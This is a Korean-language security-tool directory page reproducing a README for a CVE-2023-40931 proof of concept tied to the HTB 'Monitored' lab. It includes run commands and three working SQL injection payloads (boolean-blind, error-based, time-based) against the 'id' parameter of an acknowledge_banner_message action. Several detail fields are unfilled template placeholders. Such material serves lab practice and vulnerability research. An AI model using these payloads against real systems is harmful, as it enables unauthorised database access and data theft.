Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-40931-POC — CVE-2023-40931 개념 증명 — HTB MONITORED용 | Kitploit
도구/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

CVE-2023-40931 개념 증명 — HTB MONITORED용

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-40931 개념 증명(PoC) 🚨

이 저장소는 CVE-2023-40931의 개념 증명(PoC)을 포함합니다. 이 저장소의 목적은 교육 및 연구 목적으로만 취약점을 시연하는 것입니다. 🛠️

면책 조항 ⚠️

이 프로젝트는 교육 목적 및 승인된 테스트만을 위한 것입니다. 이 코드를 오용하면 법적 결과가 발생할 수 있습니다. 작성자는 이 코드의 오용이나 손해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오. 🔒

세부 정보 📋

  • CVE ID: CVE-2023-40931
  • 취약점 유형: [취약점 유형, 예: 원격 코드 실행, 권한 상승]
  • 영향을 받는 소프트웨어: [영향을 받는 소프트웨어 이름 및 버전]
  • 심각도: [심각도 수준, 예: 심각(Critical), 높음(High)] 🚩

자세한 내용은 공식 CVE 항목을 참조하십시오: CVE-2023-40931. 🔗

사용 방법 🚀

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    POST 매개변수 'id'가 취약합니다. 다음 페이로드가 취약점을 성공적으로 악용했습니다:

    • Boolean 기반 블라인드: 이 페이로드는 조건문을 활용하여 쿼리의 참/거짓 값을 판별하고, 부울 논리를 통해 데이터를 추출합니다.

      • 페이로드: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
  • Error 기반: 이 페이로드는 특정 오류를 트리거하여 데이터베이스 오류 메시지를 통해 정보를 추출합니다.

    • 페이로드: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  • Time 기반 블라인드: 이 페이로드는 시간 지연을 이용하여 서버의 응답 시간을 관찰함으로써 정보를 유추합니다.

    • 페이로드: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)
  • 이러한 페이로드는 SQL 인젝션 공격에 대한 취약점을 보여줍니다. 주의하여 진행하고 테스트 전에 적절한 승인을 받으십시오. 🔒

  • exploit.py 파일의 지침에 따라 PoC를 실행합니다. 🧑‍💻

    참고: 필요한 종속성이 설치되어 있는지 확인하십시오. ✅

  • 도구 다운로드